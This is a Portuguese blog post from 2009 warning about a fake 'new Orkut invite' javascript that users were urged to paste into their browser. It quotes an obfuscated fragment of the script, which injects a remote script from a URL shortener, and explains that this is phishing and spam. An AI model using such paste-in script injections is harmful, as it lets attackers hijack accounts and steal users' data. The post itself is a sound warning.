sábado, 5 de dezembro de 2009

NOVO ORKUT - PEGUE O SEU CONVITE AQUI!


Novo Orkut imagem

O novo Orkut foi baseado em um sistema de convites, uma pessoa convidade recebe 10 convites para convidar seus amigos e assim por diante.

Neste intuito uma pessoa que entende de scripts (javascript) pôs em prática seus conhecimentos para tentar roubar os dados das pessoas que utilizarem do recurso, este, divulgado no próprio Orkut em uma comunidade, como na imagem abaixo:

Não tenho 100% de certeza de ser um dado verídico, mas fiz um teste com o link no meio do código que fica da seguinte maneira a ser observada logo abaixo:

Analizando a imagem acima, como não entendo muito de javascript, sei apenas que ele cria um novo elemento (CreateElement) no corpo da página do orkut (body) e chama uma página logo após o script (tá aqui o problema) vejam abaixo como descobri:

o código está assim:

[...]appendChild(c);c.src='ht'+'tp://sn'+'.im/networkuti';void(0)

Retirando os caracteres de soma(+) do javascript você percebe um endereço de um site encurtador de URLs:

http://sn.im/networkuti pode até clicar, verá ele te enviar para outro site com os dizeres:

Esta tentativa de Phishing no orkut leva o usuário a divulgar seus dados para o site.

Repare também que os comentários deste são todos iguais, com um número em baixo típico de scripts de SPAM muito conhecido no orkut, onde recebiamos uma mensagem e logo abaixo continha estes números..

Tentativa de SPAM

Mesmo assim você confia nos scripts que coloca no seu navegador?
Não se apresse um dia o convite chega até você!

Se escrevi algo de errado por favor me avisem!

1 comentários:

MARCOS on 6 de dezembro de 2009 16:34 disse...

eae daniel perdi cai no conto kkkkkkkkkk;muito bom post;falo